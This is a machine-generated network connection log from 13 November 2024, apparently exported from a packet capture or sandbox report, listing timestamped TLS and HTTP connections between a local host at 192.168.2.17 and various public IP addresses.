                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194988966 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.195019960 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.226958990 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.226979017 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.227119923 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.227147102 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.227161884 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.227174044 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.227200031 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.234513998 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.271586895 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.271677971 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.271693945 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.271964073 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.272012949 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.272072077 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.281455040 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.281557083 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.281630039 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.283061028 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.283080101 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.438883066 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.438991070 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.439049006 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.439421892 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.439433098 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.447223902 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.447287083 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.447336912 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.447550058 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.447568893 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.456520081 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.531228065 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.531462908 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.531480074 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.532931089 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.532999039 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.533282995 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.533405066 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.533406973 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.579336882 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.583523989 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.583556890 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.631520987 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.018692017 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.018767118 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.018924952 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.018954992 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020060062 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020123959 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020358086 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020517111 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020577908 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.020997047 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021037102 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021044970 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021074057 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021442890 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021596909 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021622896 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021812916 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.021823883 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.022536039 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.022629976 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.023133039 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.025732994 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.026160955 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.026186943 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.027192116 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.027251959 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.028280020 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.028342962 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.028502941 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.028516054 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.061744928 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.061796904 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.061880112 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.062100887 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.062115908 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.063344002 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.074506044 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.074518919 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.265331984 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.265397072 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.265475035 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.266657114 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.266680002 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.268325090 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.268687963 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.268704891 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.269052029 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.271395922 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.271493912 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.271692991 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293243885 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293289900 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293338060 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293349028 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293375015 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293411016 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.293418884 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.294332027 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.294373989 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.294430971 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.319334984 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.512835979 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513016939 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513160944 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513658047 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513679028 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513689995 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.513731003 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.514637947 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.514683008 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.514750957 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.514974117 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.514990091 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.722325087 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.722395897 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.722755909 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.723243952 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.723263025 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733839035 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733876944 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733971119 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.734181881 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.734194994 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.150440931 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.150924921 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.150957108 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.151462078 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.152499914 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.152589083 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.152653933 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.152708054 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.152743101 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.205478907 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.403450966 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.403532028 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.403675079 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.404195070 CET49964443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.404211998 CET4434996454.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.561724901 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.562139988 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.562169075 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.563066959 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.563143015 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.563378096 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.563429117 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.563478947 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.600353956 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.600646973 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.600677013 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.601003885 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.601351023 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.601409912 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.601877928 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.607330084 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.617468119 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.617475033 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.647336960 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.665492058 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.721949100 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.722163916 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.722230911 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.722611904 CET49967443192.168.2.1752.22.214.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.722621918 CET4434996752.22.214.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.851489067 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.851677895 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.851819038 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.852202892 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.852224112 CET443499653.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.852235079 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.852272034 CET49965443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.853029013 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.853059053 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.853136063 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.853359938 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.853368998 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:22.857521057 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.924370050 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.924751997 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.924778938 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.925132036 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.925436974 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.925497055 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.925601959 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.971338034 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.002774954 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.002840042 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.002924919 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.003176928 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.003202915 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.196719885 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.196799040 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.196847916 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.197415113 CET49970443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.197436094 CET443499703.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.690464020 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.701718092 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.702846050 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.702873945 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.703427076 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.704797029 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.704926014 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.706607103 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.706659079 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.872567892 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.872648001 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.872699022 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.873770952 CET49973443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.873789072 CET44349973162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.876908064 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.876935959 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.877012014 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.877223969 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.877237082 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.548407078 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.548762083 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.548780918 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.549139023 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.549443007 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.549505949 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.549675941 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.549700022 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.720021963 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.720267057 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.720323086 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.720716953 CET49975443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:25.720733881 CET44349975162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:26.158494949 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:26.158539057 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:26.159357071 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:26.159357071 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:26.159394979 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.244385004 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.245222092 CET49979443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.245244026 CET4434997954.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:27.245609045 CET4434997954.75.69.192192.168.2.17
